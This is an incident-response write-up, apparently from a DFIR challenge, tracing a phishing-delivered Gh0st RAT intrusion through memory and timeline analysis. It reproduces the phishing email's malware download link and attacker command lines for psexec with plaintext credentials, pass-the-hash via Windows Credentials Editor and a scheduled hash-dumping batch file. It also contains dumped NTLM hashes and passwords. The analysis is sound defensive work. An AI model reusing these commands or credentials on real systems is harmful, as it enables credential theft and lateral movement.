                                                      34436650 Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
                                                      34436720 Regards,
                                                      34436730 The IS Department

                                                    Evidence the user callb clicked the link in the phish
                                                    Visited: callb@http://58.64.132.8/download/Symantec-1.43-1.exe

                                                    Finding the backdoor in memory
                                                    1. Try and determine if we can locate network connection and associate a pid to it.   We will do this using volatility and it looks like pid 1024 is what we want to take a closer look at.
                                                    vol.py connscan -f memdump.bin --profile=WinXPSP3x86
                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01f60850 0.0.0.0:0                 1.0.0.0:0                 36569092
                                                    0x01ffa850 172.16.150.20:1291        58.64.132.141:80          1024
                                                    0x0201f850 172.16.150.20:1292        172.16.150.10:445         4
                                                    0x02084e68 172.16.150.20:1281        172.16.150.10:389         628
                                                    0x020f8988 172.16.150.20:2862        172.16.150.10:135         696
                                                    0x02201008 172.16.150.20:1280        172.16.150.10:389         628
                                                    0x18615850 172.16.150.20:1292        172.16.150.10:445         4
                                                    0x189e8850 172.16.150.20:1291        58.64.132.141:80          1024
                                                    0x18a97008 172.16.150.20:1280        172.16.150.10:389         628
                                                    0x18b8e850 0.0.0.0:0                 1.0.0.0:0                 36569092
                                                    0x18dce988 172.16.150.20:2862        172.16.150.10:135         696

                                                    2. We now want to find out exactly what process is running with that pid.  Again we will use volatility for this.
                                                    vol.py pslist -f memdump.bin --profile=WinXPSP3x86 |grep 1024
                                                    Volatile Systems Volatility Framework 2.2
                                                    0x820b3da0 svchost.exe            1024    680     76     1645      0      0 2012-11-26 22:03:32                      
                                                    0x82045da0 wuauclt.exe            1628   1024      3      142      0      0 2012-11-26 22:04:43                      
                                                    0x82049690 wc.exe                  364   1024      1       27      0      0 2012-11-27 01:30:00 

                                                    3. Once again we will use volatility to see what loaded dll's are running under pid 1024.  We see 6to4ex.dll which was the file created on the filesystem the same time the dropper was executed.
                                                    vol.py dlllist -f memdump.bin --profile=WinXPSP3x86 -p 1024   
                                                    Volatile Systems Volatility Framework 2.2
                                                    skipping…
                                                    0x10000000    0x1c000 c:\windows\system32\6to4ex.dll

                                                    4.  I will now use volatility to carve out the all and see if I can determine if this is in fact out Gh0st rat.  Then will use use strings as a quick way to determine if this binary can be associated with the backdoor.
                                                    vol.py dlldump -f memdump.bin --profile=WinXPSP3x86 -p 1024 --dump-dir=dll
                                                    Volatile Systems Volatility Framework 2.2
                                                    Process(V) Name                 Module Base Module Name          Result
                                                    ---------- -------------------- ----------- -------------------- ------
                                                    skipping…
                                                    0x820b3da0 svchost.exe          0x010000000 6to4ex.dll           OK: module.1024.20b3da0.10000000.dll

                                                    strings dll/module.1024.20b3da0.10000000.dll |more
                                                    skipping…
                                                    Gh0st Update
                                                    Global\Gh0st %d
                                                    (note: there are additional indicators in the binary that we will use to build detection for this backdoor)

                                                    ipconfig being ran via psexec (ps.exe).  It looks like it was targeting 2 specific machines using credentials most likely obtained via hash dumping

                                                     111530668 C:\WINDOWS\System32\svchost.exe - ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig0e
                                                     111532380 C:\WINDOWS\System32\svchost.exe - ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig

                                                    Because I saw gs.exe get executed plus samsrv.dll get accessed at the same time I had a suspicion that hash dumping occurred.  My suspicions grew stronger when I saw ps.exe being executed with presumably valid credentials.  I will use the following grep command to search for hashes in the memory strings file.

                                                    cat mem.str |grep -e '[a-f0-9]\{32\}\:[a-f0-9]\{32\}'

                                                     11377473 PETRO-MARKET\callb::115b24322c11908c85140f5d33b6232f:40d1d232d5f731ea966913ea458a16e7:::
                                                      11377563 PETRO-MARKET\ENG-USTXHOU-148$::00000000000000000000000000000000:d6717f1e5252fa87ed40af8c46d8b1e2:::
                                                      11377664 PETRO-MARKET\ENG-USTXHOU-148$::00000000000000000000000000000000:d6717f1e5252fa87ed40af8c46d8b1e2:::
                                                      11377765 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
                                                      11377862 Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
                                                      11377951 HelpAssistant(current):1000:42dbf333659cabcd0b546a25124a5476:dfd19a421051e8329e0c7b5aa7fe7dbe:::
                                                      11378049 SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5168fdd9d699311c78acabde3c849622:::
                                                      11378150 sysbackup(current):1004:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
                                                     145783076 xe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
                                                     188543748 xe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
                                                     219844660 IIS-SARIYADH-03\IUSR_IIS-SARIYADH-03::a56070d051fea2efc7b9d6cef7a31133:34cda5be1d8a5a95d16760173d9b953f:::
                                                     219844768 PETRO-MARKET\saadmin::fb288acceb76f0688625caa1be8406ea:7f0de79304fa2dafd770b917d7d8a545:::
                                                     219844860 PETRO-MARKET\IIS-SARIYADH-03$::00000000000000000000000000000000:9e185f46ee242c35d328eacc15bc62ab:::
                                                     219844961 PETRO-MARKET\IIS-SARIYADH-03$::00000000000000000000000000000000:9e185f46ee242c35d328eacc15bc62ab:::
                                                     219845062 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
                                                     219845159 ASPNET(current):1007:5d7be66190782a7e815c3e85ee68a20f:0017e6c73eec714ad84200bc49752450:::
                                                     219845250 Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
                                                     219845339 IUSR_IIS-SARIYADH-03(current):1004:a56070d051fea2efc7b9d6cef7a31133:34cda5be1d8a5a95d16760173d9b953f:::
                                                     219845444 IWAM_IIS-SARIYADH-03(current):1005:3cfdff81d718e57a97db95a9e5c85a61:3c96b32a0a60fad5d5e43b71a2088471:::
                                                     219845549 SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:a0b581112e87b82bce9201ce197fdd93:::
                                                     219845650 sysbackup(current):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
                                                     219845744 sysbackup(hist_01):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::

                                                    Evidence of gsecdump found in memory

                                                      57731224 unable to start gsecdump as service
                                                      57731260 system
                                                      57731268 help
                                                      57731276 dump_all,a
                                                      57731288 dump all secrets
                                                      57731308 dump_hashes,s
                                                      57731324 dump hashes from SAM/AD
                                                      57731348 dump_lsa,l
                                                      57731360 dump lsa secrets
                                                      57731380 dump_usedhashes,u
                                                      57731400 dump hashes from active logon sessions
                                                      57731440 dump_wireless,w
                                                      57731456 dump microsoft wireless connections
                                                      57731492 help,h
                                                      57731500 show help
                                                      57731512 system,S
                                                      57731524 run as localsystem
                                                      57731544 gsecdump v0.7 by Johannes Gumbel (johannes.gumbel@truesec.se)
                                                      57731607 usage: gsecdump [options]
                                                      57731636 options
                                                      57731644 --iamservice

                                                    An additional discovery that is made is the use of pass the hash via Windows Credentials Editor (wc.exe).  We see the attacker elevating privileges to sys backup.

                                                    288587364 \WINDOWS\System32\svchost.exe - wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057

                                                    We also see the attacker grabbing locally cached passwords via wce
                                                    33660952 wc.exe -w
                                                      33660963 WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
                                                      33661089 Use -h for help.
                                                      33661111 callb\PETRO-MARKET:Mar1ners@4655
                                                      33661145 NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
                                                      33661296 ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs

                                                    There was not much information regarding ra.exe, but we also did not see that file exectuted at all.

                                                    It appears that sl.exe is scanline from Foundstone

                                                      92493044 Foundstone Inc.
                                                      92493082 FileDescription
                                                      92493116 ScanLine
                                                      92493142 FileVersion
                                                      92493168 1, 0, 1, 0
                                                      92493198 InternalName
                                                      92493224 ScanLine
                                                      92493250 LegalCopyright
                                                      92493280 Copyright
                                                      92493302  2002 Foundstone Inc.
                                                      92493354 LegalTrademarks
                                                      92493388 Copyright
                                                      92493410  2002 Foundstone Inc.
                                                      92493462 OriginalFilename
                                                      92493496 sl.exe
                                                      92493518 PrivateBuild
                                                      92493550 ProductName
                                                      92493576 ScanLine
                                                      92493602 ProductVersion

                                                    We also see evidence of what was being scanned.  The 172.16.150/24 network for ports 445, 80, 443, 21, 1433
                                                    \WINDOWS\System32\svchost.exe - sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 

                                                    net use command that appears to come from the Gh0st rat (svchost.exe) mapping a share on a remote machine.  This may explain how the dll's appeared to be copied from a different machine based on the mac times.
                                                    \WINDOWS\System32\svchost.exe - net use z: \\172.16.223.47\z

                                                    Note: this looks like normal command line share mapping (cmd.exe)
                                                    \WINDOWS\system32\cmd.exe - net use r: \\172.16.150.10\ITShare


                                                    mft entry for system5.bat found in memory

                                                    0000090: 0000 0000 0000 0000 0000 0000 0000 4649  ..............FI
                                                    00000a0: 4c45 3000 0300 dcdc 6905 0000 0000 0300  LE0.....i.......
                                                    00000b0: 0100 3800 0100 8001 0000 0004 0000 0000  ..8.............
                                                    00000c0: 0000 0000 0000 0300 0000 da2d 0000 0400  ...........-....
                                                    00000d0: 0000 0000 0000 1000 0000 6000 0000 0000  ..........`.....
                                                    00000e0: 0000 0000 0000 4800 0000 1800 0000 4b81  ......H.......K.
                                                    00000f0: d144 3ecc cd01 aee3 d344 3ecc cd01 aee3  .D>......D>.....
                                                    0000100: d344 3ecc cd01 aee3 d344 3ecc cd01 2000  .D>......D>... .
                                                    0000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000120: 0000 1301 0000 0000 0000 0000 0000 0000  ................
                                                    0000130: 0000 0000 0000 3000 0000 7000 0000 0000  ......0...p.....
                                                    0000140: 0000 0000 0200 5800 0000 1800 0100 841d  ......X.........
                                                    0000150: 0000 0000 0200 4b81 d144 3ecc cd01 4b81  ......K..D>...K.
                                                    0000160: d144 3ecc cd01 4b81 d144 3ecc cd01 4b81  .D>...K..D>...K.
                                                    0000170: d144 3ecc cd01 0000 0000 0000 0000 0000  .D>.............
                                                    0000180: 0000 0000 0000 2000 0000 0000 0000 0b03  ...... .........
                                                    0000190: 7300 7900 7300 7400 6500 6d00 3500 2e00  s.y.s.t.e.m.5...
                                                    00001a0: 6200 6100 7400 8000 0000 7000 0000 0000  b.a.t.....p.....
                                                    00001b0: 1800 0000 0100 5800 0000 1800 0000 4065  ......X.......@e
                                                    00001c0: 6368 6f20 6f66 660d 0a63 6f70 7920 633a  cho off..copy c:
                                                    00001d0: 5c77 696e 646f 7773 5c77 6562 7569 5c77  \windows\webui\w
                                                    00001e0: 632e 6578 6520 633a 5c77 696e 646f 7773  c.exe c:\windows
                                                    00001f0: 5c73 7973 7465 6d33 320d 0a61 7420 3139  \system32..at 19
                                                    0000200: 3a33 3020 7763 2e65 7865 202d 6520 2d6f  :30 wc.exe -e -o
                                                    0000210: 2068 2e6f 7574 ffff ffff 8279 4711 0000   h.out.....yG...

                                                    The mft entry for h.out showing captured hashes

                                                    0000310: 4649 4c45 3000 0300 e216 6a05 0000 0000  FILE0.....j.....
                                                    0000320: 0400 0100 3800 0100 3002 0000 0004 0000  ....8...0.......
                                                    0000330: 0000 0000 0000 0000 0300 0000 de2d 0000  .............-..
                                                    0000340: 0500 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    0000350: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    0000360: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    0000370: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    0000380: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000390: 0000 0000 c806 0000 0000 0000 0000 0000  ................
                                                    00003a0: 0000 0000 0000 0000 3000 0000 6800 0000  ........0...h...
                                                    00003b0: 0000 0000 0000 0200 4c00 0000 1800 0100  ........L.......
                                                    00003c0: 1d00 0000 0000 0100 b25c afb7 3ecc cd01  .........\..>...
                                                    00003d0: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    00003e0: b25c afb7 3ecc cd01 0000 0000 0000 0000  .\..>...........
                                                    00003f0: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000400: 0503 6800 2e00 6f00 7500 7400 0000 0000  ..h...o.u.t.....
                                                    0000410: 8000 0000 2801 0000 0000 1800 0000 0100  ....(...........
                                                    0000420: 0c01 0000 1800 0000 6361 6c6c 623a 5045  ........callb:PE
                                                    0000430: 5452 4f2d 4d41 524b 4554 3a31 3135 4232  TRO-MARKET:115B2
                                                    0000440: 3433 3232 4331 3139 3038 4338 3531 3430  4322C11908C85140
                                                    0000450: 4635 4433 3342 3632 3332 463a 3430 4431  F5D33B6232F:40D1
                                                    0000460: 4432 3332 4435 4637 3331 4541 3936 3639  D232D5F731EA9669
                                                    0000470: 3133 4541 3435 3841 3136 4537 0d0a 454e  13EA458A16E7..EN
                                                    0000480: 472d 5553 5458 484f 552d 3134 3824 3a50  G-USTXHOU-148$:P
                                                    0000490: 4554 524f 2d4d 4152 4b45 543a 3030 3030  ETRO-MARKET:0000
                                                    00004a0: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
                                                    00004b0: 3030 3030 3030 3030 3030 3030 3a44 3637  000000000000:D67
                                                    00004c0: 3137 4631 4535 3235 3246 4138 3745 4434  17F1E5252FA87ED4
                                                    00004d0: 3041 4638 4334 3644 3842 3145 320d 0a73  0AF8C46D8B1E2..s
                                                    00004e0: 7973 6261 636b 7570 3a63 7572 7265 6e74  ysbackup:current
                                                    00004f0: 3a43 3241 3339 3135 4446 3245 4337 3945  :C2A3915DF2EC79E
                                                    0000500: 4537 3331 3038 4542 3438 3037 3341 4342  E73108EB48073ACB
                                                    0000510: 373a 4537 4136 4632 3730 4631 4241 3536  7:E7A6F270F1BA56
                                                    0000520: 3241 3930 4532 4331 3333 4139 3544 3230  2A90E2C133A95D20
                                                    0000530: 3537 0d0a 0000 0000 ffff ffff 8279 4711  57...........yG.

                                                    dfir-challenge-FLD-SARIYADH-43

                                                    Timeline


                                                    User downloads and executes dropper noted by the creation of the prefetch file.  Backdoor is placed on the machine.

                                                    Tue Nov 27 2012 00:17:58   100895 .ac. r/rr-xr-xr-x 0        0        12010-128-4 c:/WINDOWS/system32/6to4ex.dll
                                                                                            22270 macb r/rrwxrwxrwx 0        0        12011-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-330FB7E3.pf

                                                    Tool drop directory is created

                                                    Tue Nov 27 2012 00:18:31       56 ...b d/drwxrwxrwx 0        0        7555-144-5 c:/WINDOWS/webui

                                                    Tools being placed on the system

                                                    Tue Nov 27 2012 00:20:06   381816 macb r/rrwxrwxrwx 0        0        12000-128-3 c:/WINDOWS/ps.exe
                                                    Tue Nov 27 2012 00:20:33   303104 macb r/rrwxrwxrwx 0        0        12005-128-3 c:/WINDOWS/webui/gs.exe
                                                    Tue Nov 27 2012 00:20:36   381816 ...b r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe
                                                    Tue Nov 27 2012 00:20:37   381816 m.c. r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe
                                                    Tue Nov 27 2012 00:20:39   403968 ...b r/rrwxrwxrwx 0        0        12013-128-3 c:/WINDOWS/webui/ra.exe
                                                    Tue Nov 27 2012 00:20:40   403968 mac. r/rrwxrwxrwx 0        0        12013-128-3 c:/WINDOWS/webui/ra.exe
                                                    Tue Nov 27 2012 00:20:42    20480 macb r/rrwxrwxrwx 0        0        12014-128-3 c:/WINDOWS/webui/sl.exe
                                                    Tue Nov 27 2012 00:20:46   208384 m.cb r/rrwxrwxrwx 0        0        12015-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                   208384 m... r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe

                                                    ipconfig is ran and at the same time netuse.dll is borne

                                                    Tue Nov 27 2012 00:21:12    10454 ...b r/rrwxrwxrwx 0        0        12016-128-3 c:/WINDOWS/webui/netuse.dll
                                                                                                   55808 .a.. r/rrwxrwxrwx 0        0        24195-128-3 c:/WINDOWS/system32/ipconfig.exe

                                                    net commands, scanline and gsecdump dump are all ran.  netuse.dll is modified

                                                    Tue Nov 27 2012 00:21:26    14550 ...b r/rrwxrwxrwx 0        0        12018-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
                                                    Tue Nov 27 2012 00:21:41    14116 ...b r/rrwxrwxrwx 0        0        12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
                                                    Tue Nov 27 2012 00:23:09     6768 macb r/rrwxrwxrwx 0        0        12020-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
                                                    Tue Nov 27 2012 00:23:35    10454 mac. r/rrwxrwxrwx 0        0        12016-128-3 c:/WINDOWS/webui/netuse.dll
                                                                                                    9990 macb r/rrwxrwxrwx 0        0        12021-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
                                                                                                    415744 .a.. r/rrwxrwxrwx 0        0        23442-128-3 c:/WINDOWS/system32/samsrv.dll

                                                    wc.exe (Windows Credentials Editor) is executed

                                                    Tue Nov 27 2012 00:24:18    13084 ...b r/rrwxrwxrwx 0        0        12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    psexec is executed

                                                    Tue Nov 27 2012 00:27:21    10330 ...b r/rrwxrwxrwx 0        0        12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf

                                                    system1.bat is created

                                                    Tue Nov 27 2012 00:31:39       91 ...b r/rrwxrwxrwx 0        0        12024-128-4 c:/WINDOWS/system1.bat

                                                    psexec is ran a second time

                                                    Tue Nov 27 2012 00:33:32     9866 ...b r/rrwxrwxrwx 0        0        12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    system1.bat is modified

                                                    Tue Nov 27 2012 00:43:34       91 mac. r/rrwxrwxrwx 0        0        12024-128-4 c:/WINDOWS/system1.bat

                                                    system6.bat is created

                                                    Tue Nov 27 2012 00:43:45      184 macb r/rrwxrwxrwx 0        0        12026-128-1 c:/WINDOWS/system6.bat

                                                    psexec is ran again

                                                    Tue Nov 27 2012 00:44:16     9866 mac. r/rrwxrwxrwx 0        0        12025-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    Additional bat scripts are placed on the machine

                                                    Tue Nov 27 2012 00:53:29       69 ...b r/rrwxrwxrwx 0        0        12027-128-3 c:/WINDOWS/webui/system2.bat
                                                    Tue Nov 27 2012 00:56:18       69 mac. r/rrwxrwxrwx 0        0        12027-128-3 c:/WINDOWS/webui/system2.bat
                                                    Tue Nov 27 2012 00:59:00       56 macb r/rrwxrwxrwx 0        0        12028-128-1 c:/WINDOWS/webui/system3.bat
                                                    Tue Nov 27 2012 01:04:59      131 ...b r/rrwxrwxrwx 0        0        12029-128-3 c:/WINDOWS/webui/system4.bat

                                                    system4.bat is modified

                                                    Tue Nov 27 2012 01:11:00      131 mac. r/rrwxrwxrwx 0        0        12029-128-3 c:/WINDOWS/webui/system4.bat

                                                    system5.bat appears on the machine

                                                    Tue Nov 27 2012 01:19:41       88 ...b r/rrwxrwxrwx 0        0        12030-128-3 c:/WINDOWS/webui/system5.bat
                                                                                                     56 mac. d/drwxrwxrwx 0        0        7555-144-5 c:/WINDOWS/webui
                                                    Tue Nov 27 2012 01:21:07       88 mac. r/rrwxrwxrwx 0        0        12030-128-3 c:/WINDOWS/webui/system5.bat

                                                    A scheduled task is created

                                                    Tue Nov 27 2012 01:21:18   208384 .a.. r/rrwxrwxrwx 0        0        12015-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                 208384 ...b r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                        322 ...b r/rrwxrwxrwx 0        0        12032-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                    12960 ...b r/rrwxrwxrwx 0        0        12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
                                                                                                   25088 .a.. r/rrwxrwxrwx 0        0        24481-128-3 c:/WINDOWS/system32/at.exe
                                                                                                    344 m.c. d/drwxrwxrwx 0        0        5458-144-1 c:/WINDOWS/Tasks

                                                    psexec is again executed

                                                    Tue Nov 27 2012 01:22:07   381816 .a.. r/rrwxrwxrwx 0        0        12012-128-3 c:/WINDOWS/webui/ps.exe

                                                    wc.exe is once again ran

                                                    Tue Nov 27 2012 01:23:23    13084 mac. r/rrwxrwxrwx 0        0        12022-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    psexec is again ran

                                                    Tue Nov 27 2012 01:24:20    10330 mac. r/rrwxrwxrwx 0        0        12023-128-4 c:/WINDOWS/Prefetch/PS.EXE-3A0FA6F9.pf

                                                    net command being executed

                                                    Tue Nov 27 2012 01:27:31    14116 mac. r/rrwxrwxrwx 0        0        12019-128-4 c:/WINDOWS/Prefetch/NET1.EXE-029B9DB4.pf
                                                                                                    124928 .a.. r/rrwxrwxrwx 0        0        23983-128-3 c:/WINDOWS/system32/net1.exe
                                                                                                      42496 .a.. r/rrwxrwxrwx 0        0        23984-128-3 c:/WINDOWS/system32/net.exe

                                                    Scheduled task is executed

                                                    Tue Nov 27 2012 01:30:00   208384 .ac. r/rrwxrwxrwx 0        0        12031-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                      322 mac. r/rrwxrwxrwx 0        0        12032-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                     268 macb r/rrwxrwxrwx 0        0        12034-128-1 c:/WINDOWS/system32/h.out

                                                    wce is executed as a result of the at job running

                                                    Tue Nov 27 2012 01:30:10    10720 macb r/rrwxrwxrwx 0        0        12035-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf

                                                    Responder activity

                                                    Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        12037-128-3 c:/Documents and Settings/amirs/mdd.exe
                                                                                                   95104 m... r/rrwxrwxrwx 0        0        12038-128-3 c:/mdd.exe

                                                    Memory Analysis


                                                    Phishing email in memory

                                                    368906260 ceived: from ubuntu-router ([172.16.150.8]) by dc-ustxhou.petro-market.org with Microsoft SMTPSVC(6.0.3790.0);
                                                     368906372       Mon, 26 Nov 2012 14:00:08 -0600
                                                     368906407 Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
                                                     368906474      by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
                                                     368906556      Mon, 26 Nov 2012 15:00:07 -0500
                                                     368906590 Message-ID: <FCE1C36C7BBC46AFB7C2A251EA868B8B@d0793h>
                                                     368906645 From: "Security Department" <isd@petro-markets.info>
                                                     368906699 To: <amirs@petro-market.org>, <callb@petro-market.org>,
                                                     368906756         <wrightd@petro-market.org>
                                                     368906792 Subject: Immediate Action
                                                     368906819 Date: Mon, 26 Nov 2012 14:59:38 -0500
                                                     368906858 MIME-Version: 1.0
                                                     368906877 Content-Type: multipart/alternative;
                                                     368906915      boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
                                                     368906970 X-Priority: 3
                                                     368906985 X-MSMail-Priority: Normal
                                                     368907012 X-Mailer: Microsoft Outlook Express 6.00.2900.5512
                                                     368907064 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
                                                     368907122 Return-Path: isd@petro-markets.info
                                                     368907159 X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
                                                     368907246 This is a multi-part message in MIME format.
                                                     368907294 ------=_NextPart_000_0015_01CDCBE6.A7B92DE0
                                                     368907339 Content-Type: text/plain;
                                                     368907366      charset="iso-8859-1"
                                                     368907389 Content-Transfer-Encoding: quoted-printable
                                                     368907436 Attn: Immediate Action is Required!!
                                                     368907476 The IS department is requiring that all associates update to the new =
                                                     368907548 version of anti-virus.  This is critical and must be done ASAP!  Failure =
                                                     368907624 to update anti-virus may result in negative actions.
                                                     368907680 Please download the new anti-virus and follow the instructions.  Failure =
                                                     368907756 to install this anti-virus may result in loosing your job!
                                                     368907818 Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
                                                     368907888 Regards,
                                                     368907898 The IS Department

                                                    Volatility connscan output shows C2 connection as well as connections to IIS-SARIYADH-03

                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01fb0d48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x02023638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x02035ae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x02080930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x020859d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x020f0d38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x0230d448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x0770fd48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x0836a638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x084c7930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x084ec9d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x08594448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x09b5cae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x0ac37d38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x16066d48 172.16.223.187:2109       172.16.150.10:389         640
                                                    0x164d3638 172.16.223.187:1265       58.64.132.141:80          1032
                                                    0x16610930 172.16.223.187:1261       172.16.150.10:135         1032
                                                    0x16c559d0 172.16.223.187:1210       172.16.223.47:445         4
                                                    0x1869d448 172.16.223.187:1241       172.16.150.10:389         632
                                                    0x197a5ae8 172.16.223.187:1259       172.16.150.10:445         4
                                                    0x1a32ad38 172.16.223.187:2179       172.16.150.10:1025        696
                                                    0x1f209d48 172.16.223.187:2109       172.16.150.10:389         640

                                                    Volatility pslist plugin shows the backdoor is running svchost.exe.  There are also psexec running as well as wce and cmd.exe processes with a ppid of 1032.

                                                    Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                Exit                
                                                    ---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
                                                    0x823c8830 System                    4      0     51      287 ------      0                                          
                                                    0x82274b90 smss.exe                544      4      3       19 ------      0 2012-11-26 22:01:51                      
                                                    0x82238da0 csrss.exe               608    544     13      387      0      0 2012-11-26 22:01:52                      
                                                    0x82214da0 winlogon.exe            632    544     17      652      0      0 2012-11-26 22:01:52                      
                                                    0x822ba638 services.exe            684    632     16      256      0      0 2012-11-26 22:01:53                      
                                                    0x822ab2d8 lsass.exe               696    632     20      411      0      0 2012-11-26 22:01:53                      
                                                    0x82244460 svchost.exe             860    684     14      188      0      0 2012-11-26 22:01:54                      
                                                    0x8217cb10 svchost.exe             944    684      9      261      0      0 2012-11-26 22:01:55                      
                                                    0x8228fda0 svchost.exe            1032    684     77     1558      0      0 2012-11-26 22:01:55                      
                                                    0x821753d8 svchost.exe            1076    684      6       84      0      0 2012-11-26 22:01:55                      
                                                    0x821bac10 svchost.exe            1128    684     14      249      0      0 2012-11-26 22:01:56                      
                                                    0x821b4a78 spoolsv.exe            1360    684      9      104      0      0 2012-11-26 22:01:58                      
                                                    0x82043da0 alg.exe                1888    684      6      104      0      0 2012-11-26 22:01:59                      
                                                    0x82223950 explorer.exe            296    260      9      366      0      0 2012-11-26 22:02:26                      
                                                    0x82226a20 msmsgs.exe              660    296      3      204      0      0 2012-11-26 22:02:32                      
                                                    0x821d43c0 ctfmon.exe              700    296      1       75      0      0 2012-11-26 22:02:32                      
                                                    0x821e8918 wuauclt.exe            1616   1032      3      142      0      0 2012-11-26 22:03:07                      
                                                    0x821d6598 msimn.exe              1984    296      7      361      0      0 2012-11-26 22:07:13                      
                                                    0x82034b40 cmd.exe                 456   1032      0 --------      0      0 2012-11-27 00:18:21  2012-11-27 00:27:30 
                                                    0x8230dc88 ps.exe                 1448    456      1       44      0      0 2012-11-27 00:27:11                      
                                                    0x820297b8 cmd.exe                1048   1032      0 --------      0      0 2012-11-27 00:27:41  2012-11-27 01:22:20 
                                                    0x821f7da0 ps.exe                 1052   1048      2       60      0      0 2012-11-27 01:11:17                      
                                                    0x82228da0 cmd.exe                 356   1032      0 --------      0      0 2012-11-27 01:16:33  2012-11-27 01:22:17 
                                                    0x81ffb2a0 ps.exe                  228    356      2       65      0      0 2012-11-27 01:22:07                      
